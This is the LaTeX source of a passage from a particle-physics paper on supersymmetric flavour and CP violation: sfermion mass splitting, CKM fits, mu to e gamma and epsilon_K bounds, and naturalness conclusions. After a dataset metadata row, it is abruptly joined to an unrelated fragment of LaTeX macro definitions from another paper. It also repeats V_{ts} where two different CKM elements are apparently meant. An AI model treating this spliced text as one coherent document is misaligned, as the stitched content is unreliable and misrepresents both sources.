The mass matrices of the sfermions can contain new sources of
flavour and CP violation, both in the hadronic and in the leptonic sector, that
manifest themselves in processes either absent (like $\mu\to e\gamma$) or extremely small
(like the electron and neutron electric dipoles) in the SM.
This possibility is often discussed (see e.g.~\cite{masiero})
in the `mass insertion' approximation~\cite{HKR}, where
the sfermion mass matrices are proportional to the unit matrix,
plus small (and unknown) off diagonal terms.
There is however no phenomenological constraint that forces
the sfermions of third generation to be degenerate with the corresponding ones of the first two generations.
Indeed, even with a maximal 12/3 splitting,
fermion/sfermion mixing angles $V_{f\tilde{f}}$ as large as the CKM ones do not necessarily produce too large effects.
Thus we will allow the masses of sfermions of third generation,
$m_{3\tilde{f}}$, to be different from the other ones,
and parametrize this 12/3 non degeneration introducing a parameter $\eta_f$:
\begin{equation}\label{eq:eta}
m^2_{1\tilde{f}}=m^2_{2\tilde{f}}=m^2_{3\tilde{f}}/\eta_f\qquad
\hbox{at the unification scale.}
\end{equation}
Rather than present a general parametrization,
we now prefer to restrict our analysis to the case
that we consider more strongly motivated~\cite{FVGUT}:
order one 12/3 splitting
(i.e. $\eta_f\sim1/2$) and 12/3 mixing angles of the order of the CKM ones
(i.e. $V_{f\tilde{f}}\sim V_{\rm CKM}$)\footnote{
This scenario is motivated by the following considerations.
The largeness of the top quark Yukawa coupling, $\lambda_t$, suggests that the unknown flavour physics
distinguishes the third generation from the other ones.
This is for example the case of a U(2) flavour symmetry~\cite{U2}.
A stronger motivation for $\eta_f\neq 1$ comes from unification~\cite{HKR,FVGUT}:
the running of the soft terms in a unified theory gives $\eta_f<1$ even if $\eta_f=1$ at tree level,
due to the large value of the unified top quark Yukawa coupling.
If $\lambda_{t}(M_{\rm GUT})\circa{>}1$ this minimal effect is always very large~\cite{LFV}.
However these values of $\lambda_{t}(M_{\rm GUT})$ close to its IR fixed point
accommodate the measured top mass only for $\tan\beta\circa{<}2$ ---
a range now disfavoured by the higgs mass bound together with naturalness consideration.
At larger $\tan\beta\gg 2$ a top mass in the measured range requires
$\lambda_{t}(M_{\rm GUT})=0.35\div0.55$:
for this smaller value the RGE running of the unified soft terms gives $\eta\sim0.8$.
More precisely, depending on the details of the model
the effect in $\eta$ can be large ($\eta=0.5$) or very small ($\eta=0.95$).
}.
For simplicity we continue to assume that all the sfermions of
each generation have a common mass the unification scale (i.e.\ $m_{i\tilde{f}}=m_i$,
so that $\eta_f=\eta$) and we assume that no new effect of this kind comes from the $A$ terms.
In the limit $\eta_f\to 0$ only the third generation sparticles have mass around the electroweak scale.
If also the third generation sleptons have few TeV masses,
we encounter the scenario named as `effective supersymmetry' in~\cite{EffectiveSUSY}.
In the opposit limit, $\eta_f\to 1$, we reduce to the `mass insertion' approximation~\cite{HKR}.
In both these cases the loop functions relevant for the various effects reduce to particular limits.
Since we consider non degenerate sfermions, we cannot use the `mass insertion' parametrization
(it is trivial to generalize it; but it becomes cumbersome since in some cases the dominant
effects come from diagrams with two or three mass insertions).
We choose $\eta_f=0.5$
(i.e.\ {\em all\/} the sfermions of third generation are significantly lighter than the other ones,
a maybe too optimistic assumption)
and we allow the fermion/sfermion mixing angles to vary in the range
\begin{eqnsystem}{sys:W}
|V_{e_L\tilde{\tau}_L}|, |V_{e_R\tilde{\tau}_R}|,
|V_{d_L\tilde{b}_L}|, |V_{d_R\tilde{b}_R}|&=&(\frac{1}{3}\div 3) |V_{td}|~~~~\\
|V_{\mu_L\tilde{\tau}_L}|, |V_{\mu_R\tilde{\tau}_R}|,
|V_{s_L\tilde{b}_L}|, |V_{s_R\tilde{b}_R}|&=&(\frac{1}{3}\div 3) |V_{ts}|~~~~
\end{eqnsystem}
(all angles are renormalized at the unification scale;
we assume that at the weak scale $V_{ts}=0.04$ and $V_{ts}=0.01$)
with complex phases of order one.
Mixing angles in the up-quark sector are less motivated and thus less controllable.
Their possible contribution to the neutron EDM will not be discussed here.
Studying this case is a good starting point for understanding what happens in similar cases.
At the end of this subsection we will comment on how our results change if one of
our simplifying but questionable assumptions is abandoned.
\begin{table}[b]
\begin{center}
$$\begin{array}{|c|c|}\hline
\chbox{parameter}&\chbox{value}\\ \hline
\Delta m_{B_d} & (0.471\pm0.016)/\hbox{ps}\\
\Delta m_{B_s} & \circa{>}12.4/\hbox{ps, see~\cite{BsBound}}\\
\varepsilon_K & (2.28\pm0.02)\cdot10^{-3}\\
V_{ub}/V_{cb} &0.093\pm0.016\\
m_t(m_t) & (166.8\pm5.3)\,{\rm GeV}\\ \hline
m_c(m_c) & (1.25\pm0.15)\,{\rm GeV}\\
A & 0.819\pm0.035\\
B_K & 0.87\pm0.14\\
B_B^{1/2} f_B & 0.201\pm0.042\\
\xi &1.14\pm0.08\\
\eta_1 & 1.38 \pm 0.53\\
\eta_2 & 0.574 \pm 0.004\\
\eta_3 & 0.47 \pm 0.04\\
\eta_B & 0.55 \pm 0.01\\ \hline
\end{array}$$
\caption[SP]{\em Values of parameters used in the determination of $(\rho,\eta)$.
The parameters in the upper rows have mainly experimental errors;
the parameters below the middle horizontal line have
dominant theorethical errors.
\label{tab:fit}}
\end{center}\end{table}
Having made specific (but motivated) assumptions, we can now compute
the resulting supersymmetric effects\footnote{The supersymmetric effects are computed as follows.
We take the expressions of the leptonic observables from~\cite{LFV}
and the hadronic ones from~\cite{HFV} (where some of them are only given in symplifying limits);
the supersymmetric CP asymmetry in $b\to sss$ is taken from~\cite{b->sss}.
We have assumed, as in~\cite{b->sss},
that the largely unknown $\mathop{\rm BR}(B_d\to\phi K_S)$ is $10^{-5}$ --- a value consistent
with the most reliable phenomenological estimate~\cite{charming}.
To compute the CP asymmetries in $b\to s\gamma$ we use the general formul\ae{} in~\cite{Rbsg,Absg}.
In the computation of $\Delta m_B$ and $\varepsilon_K$ we add some important
corrections with respect to previous analyses:
we include the recently correctly computed QCD corrections~\cite{SUSY-QCD-RGE}
and the very recent lattice values of the matrix elements of the
$\Delta B,\Delta S=2$ supersymmetric effective operators~\cite{SUSY-BB,SUSY-BK}.
Moreover we correct an error in the supersymmetric Wilson coefficient for $\Delta m_B$ in~\cite{HFV,b->sss}
(for a concidence the error only causes an irrelevant flip of the sign
of the effect in the semi-realistic limit $M_3=m_{\tilde{b}}$).
See appendix~B for the details.}
using our naturalness distribution of sparticle masses.
The results are shown in fig.s~\ref{fig:LHFV}.
The labels below each plot indicate the content of the plot;
a longer description is written in the caption.
We define here precisely the content of the two plots at the right.
The new supersymmetric effects that we are studying
do not affect in a significant way $\mathop{\rm BR}(b\to s\gamma)$
but can modify in a detectable way its chiral structure.
In the up-right plot we have plotted
the supersymmetric contribution to the direct CP asymmetry $|A_{\rm dir}^{b\to s\gamma}|$~\cite{Rbsg} defined by
$$A_{\rm dir}^{b\to s\gamma}\equiv \left.\frac{\Gamma(\bar{B}_{\bar{d}}\to X_s\gamma)-\Gamma(B_d\to X_{\bar{s}} \gamma)}
{\Gamma(\bar{B}_{\bar{d}}\to X_s\gamma)+\Gamma(B_d\to X_{\bar{s}} \gamma)}\right|_{E_\gamma>0.7 E_\gamma^{\rm max}}.$$
In the down-right plot we have plotted the supersymmetric contribution to
the mixing induced CP asymmetry~\cite{Absg}
$|A_{\rm mix}^{b\to s\gamma}|$ defined by
$$\frac{\Gamma(\bar{B}_{\bar{d}}(t)\to M \gamma)-\Gamma(B_d(t)\to M \gamma)}
{\Gamma(\bar{B}_{\bar{d}}(t)\to M\gamma)+\Gamma(B_d(t)\to M \gamma)} =
\pm A_{\rm mix}^{b\to s\gamma} \sin(|\Delta m_{B_d}| t)$$
where $\pm$ is the CP eigenvalue of the CP eigenstate $M$.
If the Wolfenstein parameters $\rho$ and $\eta$
are given by the fit in fig.~\ref{fig:fit}a, in the SM
$A_{\rm dir}^{b\to s\gamma}\approx +0.5\%$ and $A_{\rm mix}^{b\to s\gamma}\approx 5\%$.
It is however difficult to find particles $M$ that allow a precise measurement
of $A_{\rm mix}^{b\to s\gamma}$~\cite{Absg}.
We see that a non zero $\mathop{\rm BR}(\mu\to e\gamma)$
(proportional to $\mathop{\rm BR}(\mu\to e\bar{e}e)$ and
to the similar effect of $\mu\to e$ conversion~\cite{LFV},
and strongly correlated with $d_e$)
is the most promising candidate for a detectable effect.
For a precise interpretation of the results we first discuss
how large the various effects are now allowed to be,
and the future experimental prospects.
\subsubsection{Allowed supersymmetric effects}
Many of the experimental bounds are the same as the ones quoted in~\cite{LFV,HFV}.
Only the bound on the $\mu\to e\gamma$ decay and to $\mu\to e$ conversion
have been slightly improved by the {\sc Mega} and {\sc SindrumII} experiments.
The present bounds are
$\mathop{\rm BR}(\mu\to e\gamma)<3.8~10^{-11}$~\cite{BRmuegNEW} and
$\hbox{CR}(\mu\hbox{Ti}\to e\hbox{Ti})<6.1~10^{-13}$~\cite{CRmueNEW}.
It is less clear how large the various present experimental data allow to be
a supersymmetric correction to $\varepsilon_K$
(i.e.\ to CP violation in $K\bar{K}$ mixing).
The detailed study of this question is interesting because low energy QCD effects
enhance the supersymmetric contribution to $\varepsilon_K$,
that for this reason becomes one of the more promising hadronic effects.
We can answer to this question by performing a SM fit of the relevant experimental data
(i.e. the values of $\varepsilon_K$, $\Delta m_{B_d}$, $V_{ub}/V_{cb}$
and the bound on $\Delta m_{B_s}/\Delta m_{B_d}$)
with $\varepsilon_K$ itself excluded from the data to be fitted.
It has been recently noticed~\cite{FitNoEps,Mele} that this kind of fit gives an interesting result:
even omitting $\varepsilon_K$ (the only so far observed CP-violating effect)
a `good' fit is possible only in presence of CP violation.
We answer to the question in fig.~\ref{fig:fit}, where we show the best-fit values of
the Wolfenstein parameters $(\rho,\eta)$. In the improved Wolfenstein parameterization of the CKM matrix,
\begin{eqnarray*}
V_{ub}&=&|V_{ub}|e^{-i\gamma_{\rm CKM}}=A\lambda^3(\rho-i\eta)\\
V_{td}&=&|V_{td}|e^{-i\beta_{\rm CKM}}=A\lambda^3(1-{\textstyle{1\over 2}}\lambda^2)(1-\rho-i\eta).
\end{eqnarray*}
In table~\ref{tab:fit} we list the values of the parameters used in the fit
(we use the same notations and values of~\cite{Mele}).
If we treat the errors on these parameters
as standard deviations of Gaussian distributions, we obtain the fit
shown in fig.~\ref{fig:fit}a ($\varepsilon_K$ included in the fit)
and \ref{fig:fit}b ($\varepsilon_K$ not included in the fit).
If we instead assume that the parameters $\wp$ with theoretical uncertainty $\Delta\wp$
have a flat distribution with same variance as the gaussian one,
the result of the fit is essentially the same.
The case $\eta=0$ (no CP violation in the CKM matrix) fits the data worse than other values,
but is not completely outside the $99\%$ `best fit' region, as found in~\cite{Mele}.
Since there are only few data to be fitted and the `good fit' region is not very small
it is not completely safe to use the standard approximate analytic fitting tecniques~\cite{fittologia}
(we have performed our fit using a Monte Carlo technique).
More importantly, in such a situation the exact result of the fit in general depends
on the choice of the parameters to be fitted ---
for example the CKM angles $\beta_{\rm CKM}, \gamma_{\rm CKM}$ instead of $\rho, \eta$.
This dependence becomes more important when studying if
the experimental data on $\Delta m_{B_d}$, $\Delta m_{B_s}$ and $|V_{ub}/V_{cb}|$
allow the CKM matrix to be real ($\eta=0$).
To overcome all these problems we directly study how well any given particular value
of $(\rho,\eta)$ is compatible with the experimental data,
irrespective that other values could fit the data better or worse.
When there are few experimental data this question is not necessarily numerically equivalent to asking
what values of the parameters give the `best fit'.
Again the results of this kind of analysis do not depend significantly on the shape
(Gaussian or flat) of the distribution of the parameters with dominant theoretical error.
The result is shown in fig.~\ref{fig:fit}c,
assuming Gaussian distributions for all uncertainties.
We see that if $\eta=0$ and $\rho\sim0.3$ there is no unacceptable discrepancy between the
experimental data and the theoretical predictions
(using flat distributions $\eta=0$ and $\rho\sim0.3$ would be perfectly allowed).
We conclude\footnote{We however mention that a preliminary Tevatron study of the CP asymmetry
in the decay $B_d\to \psi K_S$~\cite{TevatronEta}
disfavours negative values of $\eta$. }
that we cannot exclude a SM contribution to $\varepsilon_K$ in the range
$(-2.5\div 2.5)\varepsilon_K^{\rm exp}$.
Consequently we will consider allowed a supersymmetric correction to $\varepsilon_K$ smaller than
$3.5\varepsilon_K^{\rm exp}$.
\subsubsection{Detectable supersymmetric effects}
The next question is: how sensitive to new physics will be the experiments performed in the near future?
A planned experiment at PSI is expected to explore
$\mathop{\rm BR}(\mu\to e \gamma)$ down to $10^{-14}$~\cite{muegNewExp}.
It seems possible to improve the search for the electron EDM
(and maybe also the search for the neutron EDM) by an order of magnitude~\cite{deBerk}.
Concerning $B$ and~$K$ physics,
various new experiments will be able to measure CP asymmetries accurately.
With the possible exception of $A_{\rm mix}^{b\to s\gamma}$ that is difficult to measure,
the discovery potential is however very limited by the fact that the SM background has large QCD uncertainties.
For example the precise measurement of the phase of $B$ mixing
(obtainable from the CP asymmetry in $B_d(t)\to\psi K_S$)
$\varphi_{B_d}=2\beta_{\rm CKM}+\varphi_{B_d}^{\rm SUSY}$,
says neither the value of $\beta_{\rm CKM}\equiv\arg V_{td}^*$ nor if a supersymmetric effect is present,
$\varphi_{B_d}^{\rm SUSY}\neq0$.
All proposed strategies that allow to disentangle the supersymmetric contribution
from the SM background
suffer of disappointingly large (few $10\%$) hadronic uncertainties:
\begin{itemize}
\item
One way for searching a supersymmetric effect in $B$ mixing is the following.
If one assumes an approximate SU(3) symmetry between the three light quarks $(u,d,s)$
it is possible to reconstruct the unknown SM gluonic penguins
(that affect the decay modes that allow to separate $\beta_{\rm CKM}$ and $\varphi_{B_d}^{\rm SUSY}$)
from the branching ratios of the decays $B^+_d\to \pi^+ K^0$,
$B^0_d\to\pi^-K^+$, $B^0_d\to\pi^+\pi^-$ and their CP conjugates~\cite{ReconstrPenguin}.
In this way it seems possible to detect a $30\%$ correction
to the phase of $B^0_d\bar{B}^0_{\bar{d}}$ mixing~\cite{b->sss}.
\item
Another way for searching a supersymmetric effect in $B$ mixing is the following.
In the SM the di-lepton asymmetry in $B_d\bar{B}_{\bar{d}}$ decays~\cite{AllSM,AllSUSY} is given by
$$A^{\rm SM}_{\ell\ell}=\Im\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}}\approx
0.001\arg\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}}\approx 10^{-3}$$
($M_{12}-i\Gamma_{12}/2$ is the off-diagonal element of the effective Hamiltonian in the ($B,\bar{B})$ basis)
and is suppressed due to a cancellation between contributions of the $u$ and $c$ quarks.
This cancellation could be significantly upset by unknown QCD corrections~\cite{AllSM}.
If this does not happen lepton asymmetries are a useful probe for a SUSY effect~\cite{AllSUSY}:
$$A_{\ell\ell}^{\rm SUSY}=\Im\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}+M_{12}^{\rm SUSY}}\approx
A^{\rm SM}_{\ell\ell}\frac{10^{-3}}{A^{\rm SM}_{\ell\ell}}10\varphi_{B_d}^{\rm SUSY}.$$
\item From a SM fit of the future precise experimental data
(i.e.\ using, for example, a measurement of $\Delta m_{B_s}$ and of the CP asymmetry in $B_d\to\psi K_S$)
it will be possible to predict the SM value of $\varepsilon_K$ with a
uncertainty of about $25\%$, mainly due the future uncertainties on
the Wolfenstein parameter $A$ and on
the matrix element of the operator that gives $\varepsilon_K$ in the SM,
determined with lattice techniques.
A real improvement in the lattice computation will come only when
it will possible to avoid the `quenching' approximation.
We estimate (maybe a bit optimistically) that it will possible to detect
supersymmetric corrections to $\varepsilon_K$
larger than $30\%\cdot\varepsilon_K^{\rm exp}$.
It will also be possible to try to detect a supersymmetric corrections to the phase of
$B$ mixing from a global fit of the future experimental data;
it is not possible now to say if this technique can be more efficient than
the direct ones discussed above.
\end{itemize}
A theoretically clean way of detecting a supersymmetric correction to CP violation
in $B\bar{B}$ mixing would result from
a precise determination of the phase of $B_s$ mixing
(that is very small in the SM; but its measurement does not seem experimentally feasible)
or of $\mathop{\rm BR}(K^+\to\pi^+\nu\bar{\nu})/\mathop{\rm BR}(K_L\to\pi^0\nu\bar{\nu})$
(that has small QCD uncertainties~\cite{Burassone}).
Hopefully these decay rates will be measured with $\sim\pm10\%$ accuracy in the year 2005~\cite{BNL}.
Apart for this possibility we do not know any way that allows
to detect corrections to $B$ and $K$ mixing
from new physics smaller than $(20\div30)\%$.
As a consequence we cannot be sure that a precise measurement of the
CP asymmetry in $B\to \psi K_S$
really measures the CKM angle $\beta_{\rm CKM}$ or
if instead it is contamined by a $\sim10\%$ new physics contribution.
To summarize this long discussion, we have added to each plot of fig.~\ref{fig:LHFV}
a horizontal {\special{color cmyk 0 1. 1. 0.5} dashed lines\special{color cmyk 0 0 0 1.}} that delimits
the smallest effect that we estimate detectable
(while the continuous lines delimit already excluded effects).
\subsubsection{Discussion}
We have computed the loop effects characteristic of `non minimal' supersymmetry
assuming a 12/3 splitting
between the three generations of sfermions with $\eta_f=1/2$ (see eq.\eq{eta}).
We now discuss what happens if we modify our assumptions.
The minimal effect that motivates $\eta_f\neq 1$ could give a much larger effect, $\eta\ll 1$.
This limiting case is interesting also for different reasons~\cite{EffectiveSUSY}.
If $\eta_f\approx 0$ leptonic effects are too large in about $80\%$ of the parameter space
and are almost always discoverable by planned experiments.
Among the hadronic observables,
a detectable supersymmetric effect is sometimes contained in $\varepsilon_K$ and $d_N$,
while CP violation in $B$ mixing and decays ($b\to s\gamma$, $b\to s\bar{s}s$)
is interesting only for some values of the parameter
that produce too large effects in the other leptonic and hadronic observables.
Alternatively, the 12/3 mass nondegeneration could be smaller.
If $\eta=0.9$ the GIM-like cancellation is so strong that
no effect exceeds the experimental bounds, but
leptonic effects remain discoverable in almost $50\%$ of the parameter space.
Some hadronic effects still have a small possibility of being discoverable
($\varepsilon_K$, $d_N$, CP violation in $B$ decays).
If $\eta=0.95$ only the leptonic signals have a
low probability ($\sim5\%$) of being discoverable.
\medskip
Apart for the value of $\eta$, our simplifying but questionable
assumptions can be incorrect in different ways:
\begin{enumerate}
\item We have assumed that all sfermions of third generation are lighter than the
corresponding ones of the first two generations.
Maybe only some type of sfermions
have a significant 12/3 non-degeneration:
for example the ones unified in a 10-dimensional representation of SU(5).
In this case $\mathop{\rm BR}(\mu\to e\gamma)$ gets suppressed by a factor $\sim (m_\mu/m_\tau)^2$,
but likely remains the only interesting signal of new physics.
It could instead happen that the squarks (but not the sleptons) have a significant 12/3 non-degeneration.
In this unmotivated case a detectable effect in $B$ physics is possible and accompanied
always by a detectable correction to $\varepsilon_K$ and often by a neutron EDM larger than $10^{-26}\,e\cdot\hbox{cm}$.
\item We have assumed fermion/sfermion mixing angles of the same order as the CKM ones.
Recent neutrino data~\cite{SK-atm} suggest the presence of a large mixing angle
in the leptonic sector.
It is easy to compute how the various effects get enhanced in presence of some mixing angle
larger than the CKM ones assumed in eq.s~(\ref{sys:W}).
\item We have assumed that the $A$ terms alone do not induce interesting effects.
In unification models the masses of light quarks and leptons do not obey simple unification relations:
this suggests that they arise from higher dimensional operators with complex gauge structure.
In this case, the $A$ terms cannot be universal and can induce
a new large effect in $\mu\to e \gamma$~\cite{muegA} and a maybe detectable CP asymmetry in $b\to s\gamma$.
\end{enumerate}
In none of these cases CP violation in $B$ mixing is an interesting effect.
Even if supersymmetry gives rise to larger effects than the motivated ones that we have here studied
an effect in $B$ mixing is severely limited by
the necessity of avoiding too large effects in leptonic observables, in EDMs and in $\varepsilon_K$
(but cannot be excluded, because all bounds can be avoided in one particular situation).
\section{Conclusions}\label{fine}
In conclusion, the negative results of the recent searches for supersymmetric particles, done mostly at LEP2,
pose a serious naturalness problem to all `conventional' supersymmetric models.
Fig.~\ref{fig:example} illustrates the problem
in a simple case where it is as mild as possible.
Why the numerical values of the supersymmetric parameters
should lie very close to the limiting value where
electroweak symmetry breaking is not possible?
There are two opposite attitudes with respect to the problem,
that give rise to different interesting conclusions.
\smallskip
One may think that supersymmetry has escaped detection due to an unlucky numerical accident.
This happens with a $\sim5\%$ probability (or less in various particular models),
so that this unlucky event is not very unprobable.
If this is the case we can study the naturalness probability distribution
of supersymmetric masses in the small remaining allowed range of parameters
of each model.
It is no longer very unlikely that the coloured sparticles have mass of few TeV due to an
accidental cancellation stronger than the `minimal one' necessary to explain experiments.
A second accident --- just as unprobable as the one that has prevented the discovery of supersymmetry at LEP2 ---
could make the same job at LHC
(assuming that it will not be possible to detect coloured sparticles heavier than 2 TeV.
When the coloured sparticles are so heavy,
the charginos and neutralinos are also too heavy for being detectable
via pair production followed by decay into three leptons~\cite{3lept}).
Even so, LHC has very favourable odds of discovering supersymmetry.
Before LHC, we estimate that there is
a $40\%$ probability of detecting a supersymmetric correction to $\mathop{\rm BR}(B\to X_s\gamma)$ and
a $10\%$ probability that supersymmetry affects the anomalous magnetic moment of the muon in a detectable way.
Other interesting supersymmetric signals are naturally possible only if
supersymmetry gives rise to new flavour and CP violating phenomena.
A detectable effect of this kind can be present almost everywhere
for appropriate values of the hundreds of unknown relevant supersymmetric parameters.
For this reason we have concentrated our attention to a subset of strongly
motivated, and thus controllable, signals~\cite{FVGUT}.
We find that $\mu\to e \gamma$ and the electron EDMs are interesting
candidates for a supersymmetric effect.
Effects in the hadronic sector are possible but not very promising
(the neutron EDM and $\varepsilon_K$ seem more interesting
than CP violation in $B$ mixing and decays: see fig.s~\ref{fig:LHFV}).
\smallskip
On the other hand one may instead think that $5\%$ is a small probability:
after all 95\% is often used as a confidence probability level
for excluding unseen effects.
If one still believes that supersymmetry at weak scale solves the SM naturalness problem,
the supersymmetric naturalness problem motivates the search of unconventional
models that naturally account for the negative results of the experimental searches.
The problem would be alleviated by an appropriate correlation, for example between $\mu$ and $M_3$.
We know no model that makes this prediction;
the naturalness problem implies that any model really able of predicting $\mu/M_3$
has a large probability of making a wrong prediction.
Even if some high energy model predicts the desired cancellation,
this delicate cancellation will not survive at low energy due to large RGE corrections.
In other words the required value of $\mu/M_3$ depends on the values of $\alpha_3,\lambda_t,\ldots$
(for example we need $\mu(M_{\rm GUT})/M_3(M_{\rm GUT})\approx1.5$ if $\lambda_{t\rm G}=0.5$,
and $\approx 2.5$ if $\lambda_{t\rm G}=1$).
Models where supersymmetry is mediated at lower energy can thus have some chance of being more natural.
However, exactly the opposite happens in the only appealing models of this kind: gauge mediation models.
These models predict that the right handed sleptons are lighter than the mass scale in the higgs potential,
so that naturalness problem is stronger than in supergravity models.
More importantly, if the supersymmetry breaking scale is so low that
the neutralino decays in a detectable way,
both LEP and Tevatron experiments give so stringent experimental bounds
on the neutralino mass that make this scenario unnatural.
A different way of alleviating the problem consists in having a sparticle spectrum
more degenerate than the `conventional' one.
Since the Tevatron direct bound on the gluino mass is weaker than the indirect bound
obtained from LEP2 assuming gaugino mass universality,
it is possible to reduce the mass of coloured particles
(and consequently their large RGE corrections to the $Z$ mass, that sharpen the naturalness problem)
by assuming that gaugino mass universality is strongly broken.
This possibility have recently been discussed in~\cite{bau} in the context of supergravity.
A gauge mediation model that gives a sparticle spectrum different
from the conventional one (by assuming an unconventional messenger spectrum) has been constructed in~\cite{FTred}.
In both cases, the more degenerate sparticle spectrum
allows to reduce significantly the original FT parameter.
Still, we believe that these solutions do not completely remove the unnaturalness.
Even if all the sparticles and the $W$ and $Z$ bosons have now arbitrary but comparable masses,
why only the SM vector bosons and not one of the many ($\sim10$) detectable sparticles
have been observed with mass below $M_Z$?
It will be possible to concretely explore this possibility at Tevatron in the next years.
Finally, a more original (but apparently problematic) approach is discussed in~\cite{CP}.
To conclude, we know no model that really predicts that sparticles are heavier than the $Z$ boson
(while we know many models that make the opposite prediction).
\paragraph{Acknowledgments}
We thank R. Barbieri, G. Martinelli, S. Pokorski and R. Rattazzi for useful discussions.
A.R.\ and A.S.\ thank the Scuola Normale Superiore and INFN of Pisa.
One of us (A.R.) wishes to thank
the Theoretical Physics Department of Technical University
of Munich where part of this work has been done.
$$
\special{color cmyk 0.1 0.1 0. 0.}\bullet~
\special{color cmyk 0.2 0.2 0. 0.}\bullet~
\special{color cmyk 0.3 0.3 0. 0.}\bullet~
\special{color cmyk 0.4 0.4 0. 0.}\bullet~
\special{color cmyk 0.5 0.5 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.7 0.7 0. 0.}\bullet~
\special{color cmyk 0.8 0.8 0. 0.}\bullet~
\special{color cmyk 0.9 0.9 0. 0.}\bullet~
\special{color cmyk 0.8 0.8 0. 0.}\bullet~
\special{color cmyk 0.7 0.7 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.5 0.5 0. 0.}\bullet~
\special{color cmyk 0.4 0.4 0. 0.}\bullet~
\special{color cmyk 0.3 0.3 0. 0.}\bullet~
\special{color cmyk 0.2 0.2 0. 0.}\bullet~
\special{color cmyk 0.1 0.1 0. 0.}\bullet
$$
\special{color cmyk 0 0 0 1.}
| 2024-02-18T23:40:11.985Z | 1999-03-22T13:32:47.000Z | algebraic_stack_train_0000 | 1,619 | 13,007 |
|
proofpile-arXiv_065-8006 | \section{#2}\label{S:#1}%
\ifShowLabels \TeXref{{S:#1}} \fi}
\newcommand{\ssec}[2]{\subsection{#2}\label{SS:#1}%
\ifShowLabels \TeXref{{SS:#1}} \fi}
\newcommand{\sssec}[2]{\subsubsection{#2}\label{SSS:#1}%
\ifShowLabels \TeXref{{SSS:#1}} \fi}
\newcommand{\refs}[1]{Section ~\ref{S:#1}}
\newcommand{\refss}[1]{Section ~\ref{SS:#1}}
\newcommand{\refsss}[1]{Section ~\ref{SSS:#1}}
\newcommand{\reft}[1]{Theorem ~\ref{T:#1}}
\newcommand{Main~Theorem }{Main~Theorem }
\newcommand{\refl}[1]{Lemma ~\ref{L:#1}}
\newcommand{\refp}[1]{Proposition ~\ref{P:#1}}
\newcommand{\refc}[1]{Corollary ~\ref{C:#1}}
\newcommand{\refd}[1]{Definition ~\ref{D:#1}}
\newcommand{\refr}[1]{Remark ~\ref{R:#1}}
\newcommand{\refe}[1]{\eqref{E:#1}}
\newcommand{\refcl}[1]{Claim {Cl:#1}}
\newenvironment{thm}[1]%
{ \begin{Thm} \label{T:#1} \ifShowLabels \TeXref{T:#1} \fi }%
{ \end{Thm} }
\renewcommand{\th}[1]{\begin{thm}{#1}}
\renewcommand{\eth}{\end{thm} }
\newenvironment{main}%
{ \begin{Main} \label{T:main} \ifShowLabels \TeXref{T:main} \fi }%
{ \end{Main} }
\newenvironment{lemma}[1]%
{ \begin{Lem} \label{L:#1} \ifShowLabels \TeXref{L:#1} \fi }%
{ \end{Lem} }
\newcommand{\lem}[1]{\begin{lemma}{#1}}
\newcommand{\end{lemma}}{\end{lemma}}
\newenvironment{propos}[1]%
{ \begin{Prop} \label{P:#1} \ifShowLabels \TeXref{P:#1} \fi }%
{ \end{Prop} }
\newcommand{\prop}[1]{\begin{propos}{#1}}
\newcommand{\end{propos}}{\end{propos}}
\newenvironment{corol}[1]%
{ \begin{Cor} \label{C:#1} \ifShowLabels \TeXref{C:#1} \fi }%
{ \end{Cor} }
\newcommand{\cor}[1]{\begin{corol}{#1}}
\newcommand{\end{corol}}{\end{corol}}
\newenvironment{defeni}[1]%
{ \begin{Def} \label{D:#1} \ifShowLabels \TeXref{D:#1} \fi }%
{ \end{Def} }
\newcommand{\defe}[1]{\begin{defeni}{#1}}
\newcommand{\end{defeni}}{\end{defeni}}
\newenvironment{claimenv}[1]%
{ \begin{Claim} \label{C:#1} \ifShowLabels \TeXref{C:#1} \fi }%
{ \end{Claim} }
\newcommand{\claim}[1]{\begin{claimenv}{#1}}
\newcommand{\end{claimenv}}{\end{claimenv}}
\newenvironment{remark}[1]%
{ \begin{Rem} \label{R:#1} \ifShowLabels \TeXref{R:#1} \fi }%
{ \end{Rem} }
\newcommand{\rem}[1]{\begin{remark}{#1}}
\newcommand{\end{remark}}{\end{remark}}
\newenvironment{eqtn}[1]%
{ \begin{equation} \label{E:#1} \ifShowLabels \TeXref{E:#1} \fi }%
{ \end{equation} }
\newcommand{\eq}[1]%
{ \ifShowLabels \TeXref{E:#1} \fi
\begin{equation} \label{E:#1} }
\newcommand{\end{equation}}{\end{equation}}
\newcommand{ \begin{proof} }{ \begin{proof} }
\newcommand{ \end{proof} }{ \end{proof} }
\newcommand\alp{\alpha}
\newcommand\Alp{\Alpha}
\newcommand\bet{\beta}
\newcommand\gam{\gamma}
\newcommand\Gam{\Gamma}
\newcommand\del{\delta}
\newcommand\Del{\Delta}
\newcommand\eps{\varepsilon}
\newcommand\zet{\zeta}
\newcommand\tet{\theta}
\newcommand\Tet{\Theta}
\newcommand\iot{\iota}
\newcommand\kap{\kappa}
\newcommand\lam{\lambda}
\newcommand\Lam{\Lambda}
\newcommand\sig{\sigma}
\newcommand\Sig{\Sigma}
\newcommand\vphi{\varphi}
\newcommand\ome{\omega}
\newcommand\Ome{\Omega}
\newcommand\calA{{\mathcal{A}}}
\newcommand\calB{{\mathcal{B}}}
\newcommand\calC{{\mathcal{C}}}
\newcommand\calD{{\mathcal{D}}}
\newcommand\calE{{\mathcal{E}}}
\newcommand\calF{{\mathcal{F}}}
\newcommand\calG{{\mathcal{G}}}
\newcommand\calH{{\mathcal{H}}}
\newcommand\calI{{\mathcal{I}}}
\newcommand\calJ{{\mathcal{J}}}
\newcommand\calK{{\mathcal{K}}}
\newcommand\calL{{\mathcal{L}}}
\newcommand\calM{{\mathcal{M}}}
\newcommand\calN{{\mathcal{N}}}
\newcommand\calO{{\mathcal{O}}}
\newcommand\calP{{\mathcal{P}}}
\newcommand\calQ{{\mathcal{Q}}}
\newcommand\calR{{\mathcal{R}}}
\newcommand\calS{{\mathcal{S}}}
\newcommand\calT{{\mathcal{T}}}
\newcommand\calU{{\mathcal{U}}}
\newcommand\calV{{\mathcal{V}}}
\newcommand\calW{{\mathcal{W}}}
\newcommand\calX{{\mathcal{X}}}
